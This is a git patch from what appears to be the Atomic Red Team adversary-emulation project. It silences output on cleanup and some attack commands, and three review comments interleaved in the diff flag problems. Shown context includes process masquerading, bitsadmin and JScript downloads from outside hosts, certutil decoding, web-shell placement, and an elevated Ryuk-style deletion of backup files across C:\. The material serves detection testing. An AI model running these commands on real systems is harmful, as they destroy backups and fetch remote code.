From 2f778f359e04795e8b2a709540af03c562ada614 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Tue, 10 Mar 2020 23:06:25 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master

---
 atomics/T1036/T1036.md | 12 ++---
 atomics/T1038/T1038.md | 4 +-
 atomics/T1055/T1055.md | 4 +-
 atomics/T1064/T1064.md | 2 +-
 atomics/T1071/T1071.md | 2 +-
 atomics/T1100/T1100.md | 2 +-
 atomics/T1102/T1102.md | 2 +-
 atomics/T1105/T1105.md | 4 +-
 atomics/T1107/T1107.md | 2 +-
 atomics/T1114/T1114.md | 2 +-
 atomics/T1115/T1115.md | 2 +-
 atomics/T1119/T1119.md | 8 +--
 atomics/T1121/T1121.md | 6 +--
 atomics/T1140/T1140.md | 8 +--
 atomics/T1145/T1145.md | 2 +-
 atomics/T1158/T1158.md | 6 +--
 atomics/T1197/T1197.md | 2 +-
 atomics/T1485/T1485.md | 2 +-
 atomics/T1500/T1500.md | 2 +-
 atomics/index.yaml | 110 ++++++++++++++++++++---------------------
 20 files changed, 92 insertions(+), 92 deletions(-)

diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md
index dd3b76b8f3..1a9da0c97d 100644
--- a/atomics/T1036/T1036.md
+++ b/atomics/T1036/T1036.md
@@ -54,7 +54,7 @@ cmd.exe /c %SystemRoot%\Temp\lsass.exe
 #### Cleanup Commands:
 ```
-del /Q /F %SystemRoot%\Temp\lsass.exe
+del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
 ```
@@ -100,7 +100,7 @@ cmd.exe /c %APPDATA%\notepad.exe /B
 #### Cleanup Commands:
 ```
-del /Q /F %APPDATA%\notepad.exe
+del /Q /F %APPDATA%\notepad.exe >nul 2>&1
 ```
@@ -125,7 +125,7 @@ cmd.exe /c %APPDATA%\svchost.exe /B
 #### Cleanup Commands:
 ```
-del /Q /F %APPDATA%\svchost.exe
+del /Q /F %APPDATA%\svchost.exe >nul 2>&1
 ```
@@ -150,7 +150,7 @@ cmd.exe /K %APPDATA%\taskhostw.exe
 #### Cleanup Commands:
 ```
-del /Q /F %APPDATA%\taskhostw.exe
+del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
 ```
@@ -252,8 +252,8 @@ C:\lsm.exe /c echo T1036 > C:\T1036.txt
 #### Cleanup Commands:
 ```
-del C:\T1036.txt
-del C:\lsm.exe
+del C:\T1036.txt >nul 2>&1
+del C:\lsm.exe >nul 2>&1
 ```
diff --git a/atomics/T1038/T1038.md b/atomics/T1038/T1038.md
index 8751b73115..4987667221 100644
--- a/atomics/T1038/T1038.md
+++ b/atomics/T1038/T1038.md
@@ -35,8 +35,8 @@ copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
 #### Cleanup Commands:
 ```
-del %APPDATA%\updater.exe
-del %APPDATA%\amsi.dll
+del %APPDATA%\updater.exe >nul 2>&1
+del %APPDATA%\amsi.dll >nul 2>&1
 ```
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index 26f22c3a89..4dbe38695e 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -204,8 +204,8 @@ C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
 #### Cleanup Commands:
 ```
-del C:\T1055.txt
-del C:\svchost.exe
+del C:\T1055.txt >nul 2>&1
+del C:\svchost.exe >nul 2>&1
 ```
diff --git a/atomics/T1064/T1064.md b/atomics/T1064/T1064.md
index c2118474a7..404857a37e 100644
--- a/atomics/T1064/T1064.md
+++ b/atomics/T1064/T1064.md
@@ -59,7 +59,7 @@ C:\Windows\system32\cmd.exe /Q /c #{script_to_create}
 #### Cleanup Commands:
 ```
-del #{script_to_create}
+del #{script_to_create} >nul 2>&1
 ```
diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md
index bdcea45a00..f0f67bbeb5 100644
--- a/atomics/T1071/T1071.md
+++ b/atomics/T1071/T1071.md
@@ -253,7 +253,7 @@ cscript //E:Jscript #{script_file}
 #### Cleanup Commands:
 ```
-del #{script_file} /F /Q
+del #{script_file} /F /Q >nul 2>&1
 ```
diff --git a/atomics/T1100/T1100.md b/atomics/T1100/T1100.md
index 930537fc49..0d8eac36b0 100644
--- a/atomics/T1100/T1100.md
+++ b/atomics/T1100/T1100.md
@@ -33,7 +33,7 @@ xcopy #{web_shells} #{web_shell_path}
 #### Cleanup Commands:
 ```
-del #{web_shell_path}
+del #{web_shell_path} >nul 2>&1
 ```
diff --git a/atomics/T1102/T1102.md b/atomics/T1102/T1102.md
index fc70bc0064..889559e3f9 100644
--- a/atomics/T1102/T1102.md
+++ b/atomics/T1102/T1102.md
@@ -31,7 +31,7 @@ bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsa
 #### Cleanup Commands:
 ```
-del %TEMP%\bitsadmindownload.html
+del %TEMP%\bitsadmindownload.html >nul 2>&1
 ```
diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md
index 49548f002f..3ba539ac14 100644
--- a/atomics/T1105/T1105.md
+++ b/atomics/T1105/T1105.md
@@ -331,8 +331,8 @@ OSTap copies itself in a specfic way to shares and secondary drives. This emulat
 pushd #{destination_path}
 echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
 CScript.exe AtomicTestT1105.js //E:JScript
-del AtomicTestT1105.js /Q
-del AtomicTestFileT1105.js /Q
+del AtomicTestT1105.js /Q >nul 2>&1
+del AtomicTestFileT1105.js /Q >nul 2>&1
 popd
 ```
diff --git a/atomics/T1107/T1107.md b/atomics/T1107/T1107.md
index e0772fdf7a..fb4a7a26bf 100644
--- a/atomics/T1107/T1107.md
+++ b/atomics/T1107/T1107.md
@@ -122,7 +122,7 @@ Delete a single file from the temporary directory using cmd.exe
 #### Attack Commands: Run with `command_prompt`!
 ```
 echo "T1107" > %temp%\T1107.txt
-del /f %temp%\T1107.txt
+del /f %temp%\T1107.txt >nul 2>&1
 ```
diff --git a/atomics/T1114/T1114.md b/atomics/T1114/T1114.md
index a7fc8283bd..6244fec10c 100644
--- a/atomics/T1114/T1114.md
+++ b/atomics/T1114/T1114.md
@@ -38,7 +38,7 @@ powershell -executionpolicy bypass -command $PathToAtomicsFolder\T1114\Get-Inbox
 #### Cleanup Commands:
 ```
-del #{output_file}
+del #{output_file} >nul 2>&1
 ```
diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md
index 4224b1afc3..a71389e1a3 100644
--- a/atomics/T1115/T1115.md
+++ b/atomics/T1115/T1115.md
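Review bot: In the T1107 hunk the redirection is appended to the test's Attack Command, `del /f %temp%\T1107.txt >nul 2>&1`, not to a cleanup step, so it throws away the only feedback an operator has on whether the deletion actually ran; cmd's `del` generally leaves ERRORLEVEL at 0 even when it fails, so stdout/stderr were the sole signal. Every other hunk in this patch adds `>nul 2>&1` to cleanup commands, where a silent best-effort delete is the intended behaviour, and that distinction should be kept: leave the attack line as `del /f %temp%\T1107.txt`. This file is generated, so the change presumably belongs in the technique's source YAML that the generator reads rather than in the rendered Markdown.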
@@ -35,7 +35,7 @@ clip < %temp%\T1115.txt
 #### Cleanup Commands:
 ```
-del %temp%\T1115.txt
+del %temp%\T1115.txt >nul 2>&1
 ```
diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md
index 296adfdf8e..c38f859821 100644
--- a/atomics/T1119/T1119.md
+++ b/atomics/T1119/T1119.md
@@ -103,10 +103,10 @@ tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
 #### Cleanup Commands:
 ```
-del %TEMP%\T1119_1.txt >$null 2>&1
-del %TEMP%\T1119_2.txt >$null 2>&1
-del %TEMP%\T1119_3.txt >$null 2>&1
-del %TEMP%\T1119_4.txt >$null 2>&1
+del %TEMP%\T1119_1.txt >nul 2>&1
+del %TEMP%\T1119_2.txt >nul 2>&1
+del %TEMP%\T1119_3.txt >nul 2>&1
+del %TEMP%\T1119_4.txt >nul 2>&1
 ```
diff --git a/atomics/T1121/T1121.md b/atomics/T1121/T1121.md
index bf26e69f2e..991a7fc26e 100644
--- a/atomics/T1121/T1121.md
+++ b/atomics/T1121/T1121.md
@@ -34,7 +34,7 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
 #### Cleanup Commands:
 ```
-del #{file_name}
+del #{file_name} >nul 2>&1
 ```
@@ -80,8 +80,8 @@ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
 #### Cleanup Commands:
 ```
-del #{file_name} >$null 2>&1
-del key.snk >$null 2>&1
+del #{file_name} >nul 2>&1
+del key.snk >nul 2>&1
 ```
diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md
index 87371059c9..c4bb49bcac 100644
--- a/atomics/T1140/T1140.md
+++ b/atomics/T1140/T1140.md
@@ -37,8 +37,8 @@ certutil -decode %temp%\T1140_calc.txt %temp%T1140_calc_decoded.exe
 #### Cleanup Commands:
 ```
-del %temp%\T1140_calc.txt
-del %temp%T1140_calc_decoded.exe
+del %temp%\T1140_calc.txt >nul 2>&1
+del %temp%T1140_calc_decoded.exe >nul 2>&1
 ```
@@ -68,8 +68,8 @@ copy %windir%\system32\certutil.exe %temp%\tcm.tmp
 #### Cleanup Commands:
 ```
-del %temp%\tcm.tmp
-del %temp%\T1140.txt
+del %temp%\tcm.tmp >nul 2>&1
+del %temp%\T1140.txt >nul 2>&1
 ```
diff --git a/atomics/T1145/T1145.md b/atomics/T1145/T1145.md
index c7a7e42a31..0b738020a1 100644
--- a/atomics/T1145/T1145.md
+++ b/atomics/T1145/T1145.md
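Review bot: The changed cleanup line in the first T1140 hunk, `del %temp%T1140_calc_decoded.exe >nul 2>&1`, and the matching `certutil -decode ... %temp%T1140_calc_decoded.exe` shown as hunk context, are missing the backslash after `%temp%`, so the decoded executable is written to and removed from a path like `...\AppData\Local\TempT1140_calc_decoded.exe`, a sibling of the temp directory rather than a file inside it. Now that the cleanup's output is silenced, a failure to remove that stray binary would go unnoticed on the test host. Both lines should use `%temp%\T1140_calc_decoded.exe`; since this document is generated, the fix presumably belongs in the technique source the generator reads from (the same defect appears in the index.yaml hunk for this test).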
@@ -37,7 +37,7 @@ dir c:\ /b /s .key | findstr /e .key
 #### Cleanup Commands:
 ```
-del c:\Windows\cert.key
+del c:\Windows\cert.key >nul 2>&1
 ```
diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md
index 058727befc..077c764b97 100644
--- a/atomics/T1158/T1158.md
+++ b/atomics/T1158/T1158.md
@@ -100,7 +100,7 @@ attrib.exe +s %TEMP%\T1158.txt
 #### Cleanup Commands:
 ```
-del /A:S %TEMP%\T1158.txt
+del /A:S %TEMP%\T1158.txt >nul 2>&1
 ```
@@ -125,7 +125,7 @@ attrib.exe +h %TEMP%\T1158_hidden.txt
 #### Cleanup Commands:
 ```
-del /A:H %TEMP%\T1158_hidden.txt
+del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
 ```
@@ -231,7 +231,7 @@ for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
 #### Cleanup Commands:
 ```
-del #{file_name}
+del #{file_name} >nul 2>&1
 ```
diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md
index 80b8f6f609..34fe0f9488 100644
--- a/atomics/T1197/T1197.md
+++ b/atomics/T1197/T1197.md
@@ -40,7 +40,7 @@ bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_fi
 #### Cleanup Commands:
 ```
-del #{local_file}
+del #{local_file} >nul 2>&1
 ```
diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index 63b16db473..93f5d7f01e 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -167,7 +167,7 @@ Deletes backup files in a manner similar to Ryuk ransomware.
 #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
 ```
-del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
 ```
diff --git a/atomics/T1500/T1500.md b/atomics/T1500/T1500.md
index f229030c94..d5a1f8929f 100644
--- a/atomics/T1500/T1500.md
+++ b/atomics/T1500/T1500.md
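Review bot: In the T1485 hunk the `>nul 2>&1` is added to an elevated Attack Command that recursively deletes real backup files across the whole of C:\ (`del /s /f /q c:\*.VHD ... c:\*.dsk`), which removes the only record of what was actually deleted and of any access-denied errors; cmd's `del` generally gives no usable exit code for this, so the console listing was the sole audit trail for a destructive test. The redirection is sensible on the cleanup commands elsewhere in this patch, but here it should be dropped, or redirected into a log the operator can keep, e.g. `> %TEMP%\T1485_deleted.txt 2>&1`. As this is a generated document, the change presumably needs to land in the technique's source YAML rather than in the rendered Markdown.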
@@ -32,7 +32,7 @@ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{in
 #### Cleanup Commands:
 ```
-del #{output_file}
+del #{output_file} >nul 2>&1
 ```
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 92eebc52d9..9e21c8550b 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -773,7 +773,7 @@ persistence:
 #{local_file}
 '
- cleanup_command: 'del #{local_file}
+ cleanup_command: 'del #{local_file} >nul 2>&1
 '
 - name: Download & Execute via PowerShell BITS
@@ -1356,8 +1356,8 @@ persistence:
 copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
 %APPDATA%\updater.exe -Command exit
 cleanup_command: |
- del %APPDATA%\updater.exe
- del %APPDATA%\amsi.dll
+ del %APPDATA%\updater.exe >nul 2>&1
+ del %APPDATA%\amsi.dll >nul 2>&1
 T1519:
 technique:
 x_mitre_permissions_required:
@@ -1622,7 +1622,7 @@ persistence:
 command: |
 echo T1158 > %TEMP%\T1158.txt
 attrib.exe +s %TEMP%\T1158.txt
- cleanup_command: 'del /A:S %TEMP%\T1158.txt
+ cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1
 '
 - name: Create Windows Hidden File with Attrib
@@ -1637,7 +1637,7 @@ persistence:
 command: |
 echo T1158_hidden > %TEMP%\T1158_hidden.txt
 attrib.exe +h %TEMP%\T1158_hidden.txt
- cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt
+ cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
 '
 - name: Hidden files
@@ -1710,7 +1710,7 @@ persistence:
 echo "Normal Text." > #{file_name}
 echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
 for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
- cleanup_command: 'del #{file_name}
+ cleanup_command: 'del #{file_name} >nul 2>&1
 '
 - name: Create ADS PowerShell
@@ -4967,7 +4967,7 @@ persistence:
 command: 'xcopy #{web_shells} #{web_shell_path}
 '
- cleanup_command: 'del #{web_shell_path}
+ cleanup_command: 'del #{web_shell_path} >nul 2>&1
 '
 T1084:
@@ -5517,7 +5517,7 @@ defense-evasion:
 #{local_file}
 '
- cleanup_command: 'del #{local_file}
+ cleanup_command: 'del #{local_file} >nul 2>&1
 '
 - name: Download & Execute via PowerShell BITS
@@ -6221,7 +6221,7 @@ defense-evasion:
 #{input_file}
 '
- cleanup_command: 'del #{output_file}'
+ cleanup_command: 'del #{output_file} >nul 2>&1'
 T1223:
 technique:
 x_mitre_data_sources:
@@ -6737,8 +6737,8 @@ defense-evasion:
 copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
 %APPDATA%\updater.exe -Command exit
 cleanup_command: |
- del %APPDATA%\updater.exe
- del %APPDATA%\amsi.dll
+ del %APPDATA%\updater.exe >nul 2>&1
+ del %APPDATA%\amsi.dll >nul 2>&1
 T1073:
 technique:
 x_mitre_data_sources:
@@ -6883,8 +6883,8 @@ defense-evasion:
 certutil -encode #{executable} %temp%\T1140_calc.txt
 certutil -decode %temp%\T1140_calc.txt %temp%T1140_calc_decoded.exe
 cleanup_command: |
- del %temp%\T1140_calc.txt
- del %temp%T1140_calc_decoded.exe
+ del %temp%\T1140_calc.txt >nul 2>&1
+ del %temp%T1140_calc_decoded.exe >nul 2>&1
 - name: Certutil Rename and Decode
 description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
@@ -6904,8 +6904,8 @@ defense-evasion:
 copy %windir%\system32\certutil.exe %temp%\tcm.tmp
 %temp%\tcm.tmp -decode #{executable} %temp%\T1140.txt
 cleanup_command: |
- del %temp%\tcm.tmp
- del %temp%\T1140.txt
+ del %temp%\tcm.tmp >nul 2>&1
+ del %temp%\T1140.txt >nul 2>&1
 T1089:
 technique:
 x_mitre_data_sources:
@@ -7427,7 +7427,7 @@ defense-evasion:
 elevation_required: false
 command: |
 echo "T1107" > %temp%\T1107.txt
- del /f %temp%\T1107.txt
+ del /f %temp%\T1107.txt >nul 2>&1
 - name: Delete an entire folder - Windows cmd
 description: 'Recursively delete the temporary directory and all files contained within it using cmd.exe
@@ -8270,7 +8270,7 @@ defense-evasion:
 command: |
 echo T1158 > %TEMP%\T1158.txt
 attrib.exe +s %TEMP%\T1158.txt
- cleanup_command: 'del /A:S %TEMP%\T1158.txt
+ cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1
 '
 - name: Create Windows Hidden File with Attrib
@@ -8285,7 +8285,7 @@ defense-evasion:
 command: |
 echo T1158_hidden > %TEMP%\T1158_hidden.txt
 attrib.exe +h %TEMP%\T1158_hidden.txt
- cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt
+ cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1
 '
 - name: Hidden files
@@ -8358,7 +8358,7 @@ defense-evasion:
 echo "Normal Text." > #{file_name}
 echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename}
 for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i
- cleanup_command: 'del #{file_name}
+ cleanup_command: 'del #{file_name} >nul 2>&1
 '
 - name: Create ADS PowerShell
@@ -9368,7 +9368,7 @@ defense-evasion:
 command: |
 cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
 cmd.exe /c %SystemRoot%\Temp\lsass.exe
- cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe
+ cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1
 '
 - name: Masquerading as Linux crond process.
@@ -9397,7 +9397,7 @@ defense-evasion:
 command: |
 copy %SystemRoot%\System32\cscript.exe %APPDATA%\notepad.exe /Y
 cmd.exe /c %APPDATA%\notepad.exe /B
- cleanup_command: 'del /Q /F %APPDATA%\notepad.exe
+ cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1
 '
 - name: Masquerading - wscript.exe running as svchost.exe
@@ -9413,7 +9413,7 @@ defense-evasion:
 command: |
 copy %SystemRoot%\System32\wscript.exe %APPDATA%\svchost.exe /Y
 cmd.exe /c %APPDATA%\svchost.exe /B
- cleanup_command: 'del /Q /F %APPDATA%\svchost.exe
+ cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1
 '
 - name: Masquerading - powershell.exe running as taskhostw.exe
@@ -9429,7 +9429,7 @@ defense-evasion:
 command: |
 copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\taskhostw.exe /Y
 cmd.exe /K %APPDATA%\taskhostw.exe
- cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe
+ cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1
 '
 - name: Masquerading - non-windows exe running as windows exe
@@ -9504,8 +9504,8 @@ defense-evasion:
 copy C:\Windows\System32\cmd.exe C:\lsm.exe
 C:\lsm.exe /c echo T1036 > C:\T1036.txt
 cleanup_command: |
- del C:\T1036.txt
- del C:\lsm.exe
+ del C:\T1036.txt >nul 2>&1
+ del C:\lsm.exe >nul 2>&1
 T1112:
 technique:
 x_mitre_data_sources:
@@ -10899,8 +10899,8 @@ defense-evasion:
 copy C:\Windows\System32\cmd.exe C:\svchost.exe
 C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
 cleanup_command: |
- del C:\T1055.txt
- del C:\svchost.exe
+ del C:\T1055.txt >nul 2>&1
+ del C:\svchost.exe >nul 2>&1
 T1121:
 technique:
 x_mitre_data_sources:
@@ -10990,7 +10990,7 @@ defense-evasion:
 command: |
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file}
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
- cleanup_command: 'del #{file_name}
+ cleanup_command: 'del #{file_name} >nul 2>&1
 '
 - name: Regsvs Uninstall Method Call Test
@@ -11027,8 +11027,8 @@ defense-evasion:
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file}
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
 cleanup_command: |-
- del #{file_name} >$null 2>&1
- del key.snk >$null 2>&1
+ del #{file_name} >nul 2>&1
+ del key.snk >nul 2>&1
 T1117:
 technique:
 x_mitre_data_sources:
@@ -11587,7 +11587,7 @@ defense-evasion:
 command: "C:\\Windows\\system32\\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}\nC:\\Windows\\system32\\cmd.exe /Q /c #{script_to_create} \n"
- cleanup_command: 'del #{script_to_create}
+ cleanup_command: 'del #{script_to_create} >nul 2>&1
 '
 T1218:
@@ -12484,7 +12484,7 @@ defense-evasion:
 %TEMP%\bitsadmindownload.html
 '
- cleanup_command: 'del %TEMP%\bitsadmindownload.html
+ cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1
 '
 - name: Reach out to C2 Pointer URLs via powershell
@@ -13655,8 +13655,8 @@ privilege-escalation:
 copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
 %APPDATA%\updater.exe -Command exit
 cleanup_command: |
- del %APPDATA%\updater.exe
- del %APPDATA%\amsi.dll
+ del %APPDATA%\updater.exe >nul 2>&1
+ del %APPDATA%\amsi.dll >nul 2>&1
 T1519:
 technique:
 x_mitre_permissions_required:
@@ -14902,8 +14902,8 @@ privilege-escalation:
 copy C:\Windows\System32\cmd.exe C:\svchost.exe
 C:\svchost.exe /c echo T1055 > \\localhost\c$\T1055.txt
 cleanup_command: |
- del C:\T1055.txt
- del C:\svchost.exe
+ del C:\T1055.txt >nul 2>&1
+ del C:\svchost.exe >nul 2>&1
 T1053:
 technique:
 x_mitre_permissions_required:
@@ -15608,7 +15608,7 @@ privilege-escalation:
 command: 'xcopy #{web_shells} #{web_shell_path}
 '
- cleanup_command: 'del #{web_shell_path}
+ cleanup_command: 'del #{web_shell_path} >nul 2>&1
 '
 impact:
@@ -15893,7 +15893,7 @@ impact:
 name: command_prompt
 elevation_required: true
 command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
- c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+ c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
 '
 '':
@@ -21071,7 +21071,7 @@ credential-access:
 command: |
 echo "ATOMICREDTEAM" > %windir%\cert.key
 dir c:\ /b /s .key | findstr /e .key
- cleanup_command: 'del c:\Windows\cert.key
+ cleanup_command: 'del c:\Windows\cert.key >nul 2>&1
 '
 - name: Discover Private SSH Keys
@@ -22704,7 +22704,7 @@ execution:
 command: |
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file}
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name}
- cleanup_command: 'del #{file_name}
+ cleanup_command: 'del #{file_name} >nul 2>&1
 '
 - name: Regsvs Uninstall Method Call Test
@@ -22741,8 +22741,8 @@ execution:
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk #{source_file}
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe #{file_name}
 cleanup_command: |-
- del #{file_name} >$null 2>&1
- del key.snk >$null 2>&1
+ del #{file_name} >nul 2>&1
+ del key.snk >nul 2>&1
 T1117:
 technique:
 x_mitre_data_sources:
@@ -23362,7 +23362,7 @@ execution:
 command: "C:\\Windows\\system32\\cmd.exe /Q /c echo #{command_to_execute} > #{script_to_create}\nC:\\Windows\\system32\\cmd.exe /Q /c #{script_to_create} \n"
- cleanup_command: 'del #{script_to_create}
+ cleanup_command: 'del #{script_to_create} >nul 2>&1
 '
 T1035:
@@ -25853,8 +25853,8 @@ lateral-movement:
 pushd #{destination_path}
 echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
 CScript.exe AtomicTestT1105.js //E:JScript
- del AtomicTestT1105.js /Q
- del AtomicTestFileT1105.js /Q
+ del AtomicTestT1105.js /Q >nul 2>&1
+ del AtomicTestFileT1105.js /Q >nul 2>&1
 popd
 T1077:
 technique:
@@ -26375,10 +26375,10 @@ collection:
 wmic process list > %TEMP%\T1119_3.txt
 tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
 cleanup_command: |-
- del %TEMP%\T1119_1.txt >$null 2>&1
- del %TEMP%\T1119_2.txt >$null 2>&1
- del %TEMP%\T1119_3.txt >$null 2>&1
- del %TEMP%\T1119_4.txt >$null 2>&1
+ del %TEMP%\T1119_1.txt >nul 2>&1
+ del %TEMP%\T1119_2.txt >nul 2>&1
+ del %TEMP%\T1119_3.txt >nul 2>&1
+ del %TEMP%\T1119_4.txt >nul 2>&1
 T1115:
 technique:
 x_mitre_data_sources:
@@ -26437,7 +26437,7 @@ collection:
 dir | clip
 echo "T1115" > %temp%\T1115.txt
 clip < %temp%\T1115.txt
- cleanup_command: 'del %temp%\T1115.txt
+ cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
 '
 - name: PowerShell
@@ -26752,7 +26752,7 @@ collection:
 -file #{output_file}
 '
- cleanup_command: 'del #{output_file}
+ cleanup_command: 'del #{output_file} >nul 2>&1
 '
 T1056:
@@ -28230,8 +28230,8 @@ command-and-control:
 pushd #{destination_path}
 echo var fileObject = WScript.createobject("Scripting.FileSystemObject");var newfile = fileObject.CreateTextFile("AtomicTestFileT1105.js", true);newfile.WriteLine("This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.");newfile.Close(); > AtomicTestT1105.js
 CScript.exe AtomicTestT1105.js //E:JScript
- del AtomicTestT1105.js /Q
- del AtomicTestFileT1105.js /Q
+ del AtomicTestT1105.js /Q >nul 2>&1
+ del AtomicTestFileT1105.js /Q >nul 2>&1
 popd
 T1071:
 technique:
@@ -28474,7 +28474,7 @@ command-and-control:
 command: |
 echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
 cscript //E:Jscript #{script_file}
- cleanup_command: 'del #{script_file} /F /Q
+ cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
 '
 T1032:
@@ -28868,7 +28868,7 @@ command-and-control:
 %TEMP%\bitsadmindownload.html
 '
- cleanup_command: 'del %TEMP%\bitsadmindownload.html
+ cleanup_command: 'del %TEMP%\bitsadmindownload.html >nul 2>&1
 '
 - name: Reach out to C2 Pointer URLs via powershell